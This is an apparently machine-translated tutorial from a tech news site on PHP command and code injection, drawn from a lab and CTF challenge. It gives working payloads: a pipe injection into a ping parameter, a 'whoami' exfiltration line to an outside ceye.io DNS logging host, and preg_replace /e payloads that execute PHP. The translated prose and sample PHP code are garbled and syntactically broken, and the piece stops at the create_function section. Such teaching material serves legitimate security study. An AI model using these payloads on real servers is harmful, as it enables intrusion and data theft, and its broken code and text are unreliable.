Shulou(Shulou.com)06/01 Report--

In this issue, the editor will bring you about how to inject PHP code commands. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

1. Antecedent

I saw an experiment like this in Hetian Lab today:

The topic is relatively friendly to Mengxin and belongs to the enlightening item. Students who have not yet come into contact with this kind of problem can give it a try and appreciate the charm injected by the command.

After I personally did it, I thought it would be better to summarize the recent command or code injection, so I had this article.

1. Common php command injection functions

Eval (), assert (), system (), preg_replace (), create_function, call_user_func, call_user_func_array,array_map (), backquotes, ob_start (), exec (), shell_exec (), passthru (), escapeshellcmd (), popen (), proc_open (), pcntl_exec ()

Second, background

1. Knowledge premise

I won't mention it any more here. I believe you are already familiar with these functions, and common ponies are in use.

two。 Topic actual combat

This is explained directly by the title of Hetian Lab.

See the source code given in the title:

Normal access

Http://localhost/web/hetian.php?ip=127.0.0.1

(23333 coding problem please ignore)

Is a regular ping command

We make an order injection.

Http://localhost/web/hetian.php?ip=|dir

Get echo

Let's change the routine and put this code on the server (linux).

Try:

Http://vps_ip/testsky/index.php?ip=`whoami`.2bub8m.ceye.io

You can receive an echo

And this kind of problem can be said to be common in CTF, and it is worth mastering.

3. Preg_replace ()

1. Knowledge premise

Consult the php manual

Mixed preg_replace (mixed $pattern, mixed $replacement, mixed $subject [, int $limit =-1 [, int & $count]])

Function: search for parts of the subject that match pattern and replace them with replacement.

Where it is mentioned in the error / exception:

Since PHP 5.5.0, when the "\ e" modifier is passed, an E_DEPRECATED error will be generated; from PHP 7.0.0, an E_WARNING error will be generated, and "\ e" will not work.

So it's this modifier that allows us to inject commands.

But what you need to know is:

The / e modifier is no longer supported in 7.0.0. Please use preg_replace_callback () instead.

5.5.0 / e modifier has been deprecated. Use preg_replace_callback () instead. See the documentation for more information about security risks from PREG_REPLACE_EVAL.

In practice, you need to see the php version clearly, which is no longer applicable after version 7. 0!

two。 Topic actual combat

Error_reporting (0)

$pattern = $_ GE [pat]

$replacement = $_ get [rep]

$subject = $_ ET[ sub]

If (isset ($pattern) & & isset ($replacement) & & isset ($subject))

{

Preg_replace ($pattern, $replacement, $subject)

}

Else

{

Die ()

}

Call method:

Preg_replace ("/ test/e", phpinfo (), "jutst test")

At this point phpinfo () will be executed

Because of the / e modifier, preg_replace executes the replacement parameter as PHP code

So the final payload:

? pat=/test/e&rep=phpinfo () & sub=jutst test

? pat=/test/e&rep=var_dump (`dir`) & sub=jutst test

You can see that the command was successfully injected!

4. Create_function ()

1. Knowledge premise

Consult the php manual

String create_function (string $args, string $code)

Function: a parameter passed from creating an anonymous function and returning a unique name

Look at an official example.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.